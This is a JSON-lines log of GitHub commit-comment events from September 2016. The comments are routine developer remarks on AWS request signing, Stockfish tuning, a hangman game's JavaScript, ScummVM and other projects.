{"id":"4512041878","type":"CommitCommentEvent","actor":{"login":"saby-echo"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889880,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T11:37:55Z","updated_at":"2016-09-03T11:37:55Z","body":"AWS Mumbai needs this new signature version to work. http://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-authenticating-requests.html"}},"created_at":"2016-09-03T11:37:55Z"}
{"id":"4512043435","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18889884,"position":null,"line":null,"path":null,"commit_id":"f1a6db95cc68bac9374b826deb571b5497b098b1","created_at":"2016-09-03T11:39:26Z","updated_at":"2016-09-03T11:39:26Z","body":"The bar also shows when there is no navigation bar."}},"created_at":"2016-09-03T11:39:26Z"}
{"id":"4512043778","type":"CommitCommentEvent","actor":{"login":"karthidrive"},"repo":{"name":"karthidrive/Energython"},"payload":{"comment":{"id":18889885,"position":null,"line":null,"path":null,"commit_id":"ddcb13eb76375b4193cc08c5f804fddac2c21e12","created_at":"2016-09-03T11:39:48Z","updated_at":"2016-09-03T11:39:48Z","body":"Test Commit"}},"created_at":"2016-09-03T11:39:48Z"}
{"id":"4512043971","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889886,"position":28,"line":28,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:39:59Z","updated_at":"2016-09-03T11:39:59Z","body":"Wywołanie randomWord() wewnątrz hideLetters() powoduje, że wywołując drawWord() wykonujesz już aż 3 czynności. "}},"created_at":"2016-09-03T11:39:59Z"}
{"id":"4512044691","type":"CommitCommentEvent","actor":{"login":"jithu480"},"repo":{"name":"Sanath-K-S/sv-project"},"payload":{"comment":{"id":18889887,"position":null,"line":null,"path":null,"commit_id":"69482fdcff8f8565a348026c61f413a14457461f","created_at":"2016-09-03T11:40:37Z","updated_at":"2016-09-03T11:40:37Z","body":"machane valla idea indo?"}},"created_at":"2016-09-03T11:40:37Z"}
{"id":"4512045756","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889888,"position":32,"line":32,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:41:41Z","updated_at":"2016-09-03T11:41:41Z","body":"Tutaj możesz zastosować trick na wygenerowanie tablicy który Ci kiedyś pokazywałem ;)"}},"created_at":"2016-09-03T11:41:41Z"}
{"id":"4512048095","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889893,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T11:43:52Z","updated_at":"2016-09-03T11:43:52Z","body":"I think it is OK now. Good luck !\r\n\r\nI see that you also adjusted the 4th parameters for something smaller than the auto generated values, \r\nwhich is a wise choice, since those values are believed to be close to optimality. However if tuning is not moving after 10000 games, you might consider a larger 5th parameter.\r\n\r\nKnightValueMg,753,0,1506,8,0.0020\r\nBishopValueMg,826,0,1652,8,0.0020\r\nRookValueMg,1285,0,2570,12,0.0020\r\nQueenValueMg,2513,0,5026,15,0.0020"}},"created_at":"2016-09-03T11:43:52Z"}
{"id":"4512048228","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":18889894,"position":null,"line":null,"path":null,"commit_id":"4d11f2fbf0fb9826723f043574aafe909bca7b45","created_at":"2016-09-03T11:44:01Z","updated_at":"2016-09-03T11:44:01Z","body":"You asked on IRC, whether we should make these engines dependent on MP3. The answer is \"no in most cases\", as MP3 in these engines used only by the recompressed music.\r\n\r\nHowever, if some original was using MP3 in the original game data, then yes, we need to add new feature."}},"created_at":"2016-09-03T11:44:01Z"}
{"id":"4512048663","type":"CommitCommentEvent","actor":{"login":"Souler"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889895,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T11:44:29Z","updated_at":"2016-09-03T11:44:29Z","body":"Ok, two questions pop in my head:\r\n1. Should it be added to the Bean AWS interactions aswell?\r\n2. Is this always necessary? Or only when using one specific auth method (CLI or Access/SecretKey) ?"}},"created_at":"2016-09-03T11:44:29Z"}
{"id":"4512048817","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889896,"position":54,"line":54,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:44:37Z","updated_at":"2016-09-03T11:44:37Z","body":"Spróbuj zrefaktorować kod tak powyższe funkcje nie wywoływały się nawzajem, zamiast tego w tym miejscu możesz wywoływać je po kolei:\r\n\r\nvar word = randomWord();\r\nvar hiddenWord = hideLetters(word);\r\ndrawWord(hiddenWord);"}},"created_at":"2016-09-03T11:44:37Z"}
{"id":"4512052926","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889901,"position":1,"line":1,"path":"style/reset.css","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:48:42Z","updated_at":"2016-09-03T11:48:42Z","body":"Zamiast reseta lepiej użyć np. Normalize.css: https://necolas.github.io/normalize.css/\r\n\r\nNormalizer nie usuwa całkiem podstawowych styli (przez co tylko dodajesz sobie pracy bo później większość odtwarzasz), tylko eliminuje różnice pomiędzy przeglądarkami."}},"created_at":"2016-09-03T11:48:42Z"}
{"id":"4512053472","type":"CommitCommentEvent","actor":{"login":"Eddydpyl"},"repo":{"name":"Eddydpyl/FABS"},"payload":{"comment":{"id":18889902,"position":null,"line":null,"path":null,"commit_id":"e0fd44b367df9fd3fd67d00bb04d66196e1a0d64","created_at":"2016-09-03T11:49:13Z","updated_at":"2016-09-03T11:49:13Z","body":"Forgot to add these when I first pushed"}},"created_at":"2016-09-03T11:49:13Z"}
{"id":"4512054167","type":"CommitCommentEvent","actor":{"login":"kanugan"},"repo":{"name":"kanugan/kanugan.github.io"},"payload":{"comment":{"id":18889903,"position":null,"line":null,"path":null,"commit_id":"11a83737975bd965773b3a98fa4022ab9a11d1bb","created_at":"2016-09-03T11:49:57Z","updated_at":"2016-09-03T11:49:57Z","body":"Added swipe support for mobile devices. Reduced image sizes for faster page loads. "}},"created_at":"2016-09-03T11:49:57Z"}
{"id":"4512057038","type":"CommitCommentEvent","actor":{"login":"saby-echo"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889905,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T11:52:47Z","updated_at":"2016-09-03T11:52:47Z","body":"1. I think it should be a top-level configuration along with Access/Secret Key.\r\n2. AWS is moving to this new signing method for aws api requests. \r\n\r\nhttp://docs.aws.amazon.com/general/latest/gr/signature-version-4.html"}},"created_at":"2016-09-03T11:52:47Z"}
{"id":"4512059568","type":"CommitCommentEvent","actor":{"login":"msaeed027"},"repo":{"name":"msaeed027/TelnetClient"},"payload":{"comment":{"id":18889908,"position":null,"line":null,"path":null,"commit_id":"4fcd336e81836a7c79ae7966f20d8ad7d93b5a9a","created_at":"2016-09-03T11:55:16Z","updated_at":"2016-09-03T11:55:16Z","body":"Fix typo"}},"created_at":"2016-09-03T11:55:16Z"}
{"id":"4512060501","type":"CommitCommentEvent","actor":{"login":"sreekanthsnair"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18889911,"position":35,"line":71,"path":"egov/egov-restapi/src/main/java/org/egov/restapi/model/CreatePropertyDetails.java","commit_id":"2dfa7134b1802c96b88d5098d5a86d010ac7f6a2","created_at":"2016-09-03T11:56:13Z","updated_at":"2016-09-03T11:56:13Z","body":"toString is it a requirement ? If so don't try this sort, turn on show.sql and see how many queries getting fired when you call toString"}},"created_at":"2016-09-03T11:56:13Z"}
{"id":"4512062026","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889917,"position":null,"line":null,"path":null,"commit_id":"e67d863a0adafbb71253a7853229c23f93652822","created_at":"2016-09-03T11:57:43Z","updated_at":"2016-09-03T11:57:43Z","body":"@dktapps Delete the branch because I think I will not have so much time to maintain this branch any more. But I found I still have a little time."}},"created_at":"2016-09-03T11:57:43Z"}
{"id":"4512062314","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18889919,"position":null,"line":null,"path":null,"commit_id":"473473d305901249bc7c5a99980239cf0c271c6c","created_at":"2016-09-03T11:57:59Z","updated_at":"2016-09-03T11:57:59Z","body":"Should this be closed?"}},"created_at":"2016-09-03T11:57:59Z"}
{"id":"4512065119","type":"CommitCommentEvent","actor":{"login":"mbg033"},"repo":{"name":"mbg033/bitmonero"},"payload":{"comment":{"id":18889922,"position":null,"line":null,"path":null,"commit_id":"43677f9d68dae2e82009e0e0290767a37e07a037","created_at":"2016-09-03T12:00:24Z","updated_at":"2016-09-03T12:00:24Z","body":"Fix one more linkage issue for GUI "}},"created_at":"2016-09-03T12:00:24Z"}
{"id":"4512065443","type":"CommitCommentEvent","actor":{"login":"MWFIAE"},"repo":{"name":"MWFIAE/BetonQuest-Editor"},"payload":{"comment":{"id":18889924,"position":null,"line":null,"path":null,"commit_id":"225709de971a1ab1966f6c108c89df051c5e3841","created_at":"2016-09-03T12:00:39Z","updated_at":"2016-09-03T12:00:39Z","body":"Hey :)\r\n\r\nI even included it in the commit-text:\r\n\"Added editing with mouseclick\r\nyeah, I also think a double click would be nicer\"\r\n\r\nBut I wasn't sure how to get it working in javafx without some ugly workarounds, so I just used a single click for now :smile: "}},"created_at":"2016-09-03T12:00:39Z"}
{"id":"4512066131","type":"CommitCommentEvent","actor":{"login":"AndroidCyprus"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18889925,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-03T12:01:18Z","updated_at":"2016-09-03T12:01:18Z","body":"Greenglish??"}},"created_at":"2016-09-03T12:01:18Z"}
{"id":"4512066656","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18889926,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T12:01:48Z","updated_at":"2016-09-03T12:01:48Z","body":"Looking at your SPSA params...\r\nspaceThreshold,12222,0,24444,60,0.0030\r\n\r\nUsing 12222 +- 60 is not likely to change very much the piece configurations that will trigger the condition.\r\nI'm starting to believe that this parameter is not tunable, or you would need something larger than 60.\r\n\r\nAnother idea could be to pre-calculate all the possible piece sum values, sort them into an array,\r\nand tune the index that should be used in that array.\r\n\r\nThere are not so many configurations  that are currently allowed."}},"created_at":"2016-09-03T12:01:48Z"}
{"id":"4512066770","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/state-threads"},"payload":{"comment":{"id":18889927,"position":null,"line":null,"path":null,"commit_id":"9a17dec8f9c2814d93761665df7c5575a4d2d8a3","created_at":"2016-09-03T12:01:54Z","updated_at":"2016-09-03T12:01:54Z","body":"for https://github.com/ossrs/state-threads/issues/1"}},"created_at":"2016-09-03T12:01:54Z"}
{"id":"4512066994","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889928,"position":null,"line":null,"path":null,"commit_id":"b75f48f0c9dad1d4e3154db3af30b034463dab2c","created_at":"2016-09-03T12:02:08Z","updated_at":"2016-09-03T12:02:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 49](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12473&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-03T12:02:08Z"}
{"id":"4512067459","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889929,"position":4,"line":4,"path":"style/style.css","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T12:02:33Z","updated_at":"2016-09-03T12:02:33Z","body":"Nie wszystkie fonty są dostępne na wszystkich systemach. Możesz wymienić kilka podobnych fontów po przecinkach, użyty zostanie pierwszy który jest dostępny w systemie użytkownika:\r\n\r\nfont-family: \"Helvetica Neue\", Helvetica, Arial, sans-serif;\r\n\r\nHelvetica jest ładniejsza, więc umieściłem ją na początku, na Windowsie domyślnie nie jest zainstalowana, więc użyty zostanie Arial.\r\n\r\nNa końcu zawsze podajesz sans-serif, serif lub monospace. Oznacza to domyślny font w systemie danego typu.\r\n\r\nhttp://www.cssfontstack.com/"}},"created_at":"2016-09-03T12:02:33Z"}
{"id":"4512067701","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889930,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:02:47Z","updated_at":"2016-09-03T12:02:47Z","body":"Hi, you have to set the base tag to your tuning branch."}},"created_at":"2016-09-03T12:02:47Z"}
{"id":"4512068710","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889931,"position":null,"line":null,"path":null,"commit_id":"b75f48f0c9dad1d4e3154db3af30b034463dab2c","created_at":"2016-09-03T12:03:43Z","updated_at":"2016-09-03T12:03:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 49](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12473&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:35"}},"created_at":"2016-09-03T12:03:43Z"}
{"id":"4512068848","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889932,"position":2,"line":2,"path":"style/style.css","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T12:03:52Z","updated_at":"2016-09-03T12:03:52Z","body":"Zapoznaj się i zacznij przyzwyczajać się do box-sizing: border-box;"}},"created_at":"2016-09-03T12:03:52Z"}
{"id":"4512068983","type":"CommitCommentEvent","actor":{"login":"dngreenst"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18889933,"position":null,"line":null,"path":null,"commit_id":"473473d305901249bc7c5a99980239cf0c271c6c","created_at":"2016-09-03T12:04:01Z","updated_at":"2016-09-03T12:04:01Z","body":"Issue 108 can be closed in a moment, I'm changing wizard.InfixToAssignment function call to wizard.infix variation and making sure that the tests still pass. \r\n\r\nThe XOR bug is still alive and kicking - I've opened a new issue regarding it."}},"created_at":"2016-09-03T12:04:01Z"}
{"id":"4512070637","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18889936,"position":11,"line":11,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T12:05:38Z","updated_at":"2016-09-03T12:05:38Z","body":"Name is too generic."}},"created_at":"2016-09-03T12:05:38Z"}
{"id":"4512070912","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18889937,"position":12,"line":12,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T12:05:53Z","updated_at":"2016-09-03T12:05:53Z","body":"public is not needed"}},"created_at":"2016-09-03T12:05:53Z"}
{"id":"4512071669","type":"CommitCommentEvent","actor":{"login":"yanncam"},"repo":{"name":"yanncam/UnSHc"},"payload":{"comment":{"id":18889939,"position":null,"line":null,"path":null,"commit_id":"ed2cb64a5cec3390426c934d7d8416a90b05b299","created_at":"2016-09-03T12:06:30Z","updated_at":"2016-09-03T12:06:30Z","body":"Without the original *.sh file and the *.sh.x encrypted one, I can't answer you.\r\nPlease provide me two samples of file (unencrypted and ecrypted) to perform some analysis.\r\n\r\nFor all my test, UnSHc works well and decrypt all file.\r\n\r\nSincerely,"}},"created_at":"2016-09-03T12:06:30Z"}
{"id":"4512071792","type":"CommitCommentEvent","actor":{"login":"Souler"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889940,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T12:06:38Z","updated_at":"2016-09-03T12:06:38Z","body":"According to [this](http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAWSSDK.html#specify-signature-version) and [this](https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md#2412) :\r\n>  S3 clients instantiated without a user-defined signatureVersion will now default to v2 unless the region only supports v4 signing. This change is being made due to issues sending non-ascii characters in headers when using v4 signing.\r\nSo maybe updating the `aws-sdk` dependency will solve the problem automagically?"}},"created_at":"2016-09-03T12:06:38Z"}
{"id":"4512072082","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889942,"position":8,"line":39,"path":"index.html","commit_id":"046ae130071ab01f7d79fc4b5e43130609a3a533","created_at":"2016-09-03T12:06:53Z","updated_at":"2016-09-03T12:06:53Z","body":"Nie używaj onclick. Zamiast tego możesz dodać atrybut data-letter=\"A\" i jakąś klasę, podpiąć zdarzenie pod wszystkie elementy danej klasy i sprawdzać zawartość data-letter."}},"created_at":"2016-09-03T12:06:53Z"}
{"id":"4512075702","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889943,"position":89,"line":78,"path":"js/hangman.js","commit_id":"046ae130071ab01f7d79fc4b5e43130609a3a533","created_at":"2016-09-03T12:10:26Z","updated_at":"2016-09-03T12:10:26Z","body":"Czy powyższa funkcja nie inkrementuje hit lub miss dla każdej litery? "}},"created_at":"2016-09-03T12:10:26Z"}
{"id":"4512076296","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"AOSP-CAF/platform_manifest"},"payload":{"comment":{"id":18889944,"position":null,"line":null,"path":null,"commit_id":"ed629ab2228e66791a258953ff75f970e915df5d","created_at":"2016-09-03T12:11:02Z","updated_at":"2016-09-03T12:11:02Z","body":"Today i build nougat from this branch LA.UM.5.5_rb1.10\r\ni have the same problem over there. its like the camera is resetting over and over.\r\nnot able to make logs \r\nthe weird thing is mi4 from @ShivamKumarJha has same soc and 3.4 kernel as my lg g3.\r\nSo it must be something in the device tree (init maybe?) but i am not experienced enough to fix it.\r\n\r\nCan i ask u guys for a little help? or at least a quick check?\r\n\r\nhttps://github.com/AOSP-G3/platform_manifest"}},"created_at":"2016-09-03T12:11:02Z"}
{"id":"4512076654","type":"CommitCommentEvent","actor":{"login":"saby-echo"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889945,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T12:11:24Z","updated_at":"2016-09-03T12:11:24Z","body":"Yes the latest version does it automatically."}},"created_at":"2016-09-03T12:11:24Z"}
{"id":"4512076725","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18889946,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T12:11:30Z","updated_at":"2016-09-03T12:11:30Z","body":"ahhhh Im free to test it :)"}},"created_at":"2016-09-03T12:11:30Z"}
{"id":"4512077134","type":"CommitCommentEvent","actor":{"login":"im-mi"},"repo":{"name":"shish/shimmie2"},"payload":{"comment":{"id":18889947,"position":null,"line":null,"path":null,"commit_id":"3051334d8f153862a3e1b1a6de65c08b31ede52d","created_at":"2016-09-03T12:11:56Z","updated_at":"2016-09-03T12:11:56Z","body":"Oops!"}},"created_at":"2016-09-03T12:11:56Z"}
{"id":"4512077352","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889948,"position":null,"line":null,"path":null,"commit_id":"e67d863a0adafbb71253a7853229c23f93652822","created_at":"2016-09-03T12:12:11Z","updated_at":"2016-09-03T12:12:11Z","body":"@PeratX alright good :)"}},"created_at":"2016-09-03T12:12:11Z"}
{"id":"4512077497","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18889949,"position":null,"line":null,"path":null,"commit_id":"f1a6db95cc68bac9374b826deb571b5497b098b1","created_at":"2016-09-03T12:12:22Z","updated_at":"2016-09-03T12:12:22Z","body":"Forgot to check if there's a navbar first before showing that. Fix will be included with next commit."}},"created_at":"2016-09-03T12:12:22Z"}
{"id":"4512078764","type":"CommitCommentEvent","actor":{"login":"SAP0312"},"repo":{"name":"Procured-Inc/brd"},"payload":{"comment":{"id":18889950,"position":null,"line":null,"path":null,"commit_id":"d783107ce0428ef1fedcb8fb4ddaadbae02109c2","created_at":"2016-09-03T12:13:31Z","updated_at":"2016-09-03T12:13:31Z","body":"Shubham A Patidar"}},"created_at":"2016-09-03T12:13:31Z"}
{"id":"4512078822","type":"CommitCommentEvent","actor":{"login":"Easter1021"},"repo":{"name":"Easter1021/docker_with_laravel_53"},"payload":{"comment":{"id":18889951,"position":null,"line":null,"path":null,"commit_id":"de37914fb3858ba52ad6d7920b22e4a707b920eb","created_at":"2016-09-03T12:13:35Z","updated_at":"2016-09-03T12:13:35Z","body":"#5 "}},"created_at":"2016-09-03T12:13:35Z"}
{"id":"4512079709","type":"CommitCommentEvent","actor":{"login":"RoccoDeveloping"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18889952,"position":null,"line":null,"path":null,"commit_id":"75557ea2a44ed9847cc9b54de4cf8843e4b6a3ea","created_at":"2016-09-03T12:14:24Z","updated_at":"2016-09-03T12:14:24Z","body":"Spawn doesn't work with /spawn"}},"created_at":"2016-09-03T12:14:24Z"}
{"id":"4512082563","type":"CommitCommentEvent","actor":{"login":"SAP0312"},"repo":{"name":"Procured-Inc/brd"},"payload":{"comment":{"id":18889954,"position":null,"line":null,"path":null,"commit_id":"d783107ce0428ef1fedcb8fb4ddaadbae02109c2","created_at":"2016-09-03T12:16:42Z","updated_at":"2016-09-03T12:16:42Z","body":"Vikash it's Shubham A Patidar"}},"created_at":"2016-09-03T12:16:42Z"}
{"id":"4512082852","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889955,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:16:58Z","updated_at":"2016-09-03T12:16:58Z","body":"Hi Stefano,\r\nso the bench should be the same for both the test and the base?"}},"created_at":"2016-09-03T12:16:58Z"}
{"id":"4512084555","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889956,"position":92,"line":51,"path":"js/hangman.js","commit_id":"17033fda804996b444d10d22ab7d755924bbcc76","created_at":"2016-09-03T12:18:28Z","updated_at":"2016-09-03T12:18:28Z","body":"Ta funkcja może mieć 2 linijki zamiast prawie 40:\r\nvar hang = document.getElementById('hang_' + miss);\r\nhang.style.display = 'block';"}},"created_at":"2016-09-03T12:18:28Z"}
{"id":"4512085109","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"koquantam/android_device_samsung_grandprimeve3g"},"payload":{"comment":{"id":18889957,"position":null,"line":null,"path":null,"commit_id":"d4e31a4938d1898df7d2e6d89b9a9a6cb3791130","created_at":"2016-09-03T12:18:59Z","updated_at":"2016-09-03T12:18:59Z","body":"Bro, that kernel defconfig flag is useless. Just try recompile the kernel without modifying that flag and you'll know"}},"created_at":"2016-09-03T12:18:59Z"}
{"id":"4512085179","type":"CommitCommentEvent","actor":{"login":"Johnmacrocraft"},"repo":{"name":"ParkChanSol/Genisys"},"payload":{"comment":{"id":18889958,"position":null,"line":null,"path":null,"commit_id":"7ff66406638963622091f4eddec842f0979fc0d2","created_at":"2016-09-03T12:19:04Z","updated_at":"2016-09-03T12:19:04Z","body":"앵???"}},"created_at":"2016-09-03T12:19:04Z"}
{"id":"4512085363","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18889959,"position":null,"line":null,"path":null,"commit_id":"2a7129f96a61164d25fe362c2f72715cf7d19aba","created_at":"2016-09-03T12:19:12Z","updated_at":"2016-09-03T12:19:12Z","body":"You have setup the spsa-tuning wrong. To work properly the tuning branch is matched against itself, not the master."}},"created_at":"2016-09-03T12:19:12Z"}
{"id":"4512085538","type":"CommitCommentEvent","actor":{"login":"PtiLuky"},"repo":{"name":"assomaker/manifmaker"},"payload":{"comment":{"id":18889960,"position":null,"line":null,"path":null,"commit_id":"c7c572f6046927c5cae825a2e4206eb3d45d5cbf","created_at":"2016-09-03T12:19:21Z","updated_at":"2016-09-03T12:19:21Z","body":"Oups, j'avais pas vu les messages ici...\r\n\r\nDu coup, normalement si j'ai pas eu de problème, c'est sur la nouvelle branche \"task_design\" dont j'ai demandé un merge ensuite puisque je ne pense plus avoir de choses à changer sur la branche."}},"created_at":"2016-09-03T12:19:21Z"}
{"id":"4512086177","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889962,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:19:56Z","updated_at":"2016-09-03T12:19:56Z","body":"Check now please.\r\nI put the same branch and bench for both the test and the base."}},"created_at":"2016-09-03T12:19:56Z"}
{"id":"4512086666","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889963,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:20:22Z","updated_at":"2016-09-03T12:20:22Z","body":"Yes, but for instance the tag should be the same. Just follow step-by-step the procedure described in \r\n1) https://github.com/glinscott/fishtest/wiki/Creating-my-first-test#tuning-with-spsa and \r\n2) https://github.com/glinscott/fishtest/wiki/Creating-my-first-test#spsa-tests\r\n\r\nWrt to 2), take case of point 2.\r\n"}},"created_at":"2016-09-03T12:20:22Z"}
{"id":"4512087158","type":"CommitCommentEvent","actor":{"login":"YuxuanLin"},"repo":{"name":"YuxuanLin/CoPlayV2"},"payload":{"comment":{"id":18889964,"position":null,"line":null,"path":null,"commit_id":"acb1c2ac21dc7a15f62eaada9e621a316758afca","created_at":"2016-09-03T12:20:50Z","updated_at":"2016-09-03T12:20:50Z","body":"https://www.pivotaltracker.com/story/show/129742883"}},"created_at":"2016-09-03T12:20:50Z"}
{"id":"4512087274","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889965,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:20:58Z","updated_at":"2016-09-03T12:20:58Z","body":"Now it looks correct!"}},"created_at":"2016-09-03T12:20:58Z"}
{"id":"4512090101","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"ZanderBrown/lxterminal"},"payload":{"comment":{"id":18889974,"position":null,"line":null,"path":null,"commit_id":"b4498075ddd3b30884023315d707a105ab0b2691","created_at":"2016-09-03T12:23:42Z","updated_at":"2016-09-03T12:23:42Z","body":"ok some data/Makefile got in somehow..."}},"created_at":"2016-09-03T12:23:42Z"}
{"id":"4512091610","type":"CommitCommentEvent","actor":{"login":"andsild"},"repo":{"name":"andsild/nixpkgs"},"payload":{"comment":{"id":18889994,"position":null,"line":null,"path":null,"commit_id":"b7873e6aefc8695fdda4d6cd3566efbdd474c817","created_at":"2016-09-03T12:25:07Z","updated_at":"2016-09-03T12:25:07Z","body":"Delete key patch:\r\nhttp://lists.suckless.org/dev/1212/13800.html"}},"created_at":"2016-09-03T12:25:07Z"}
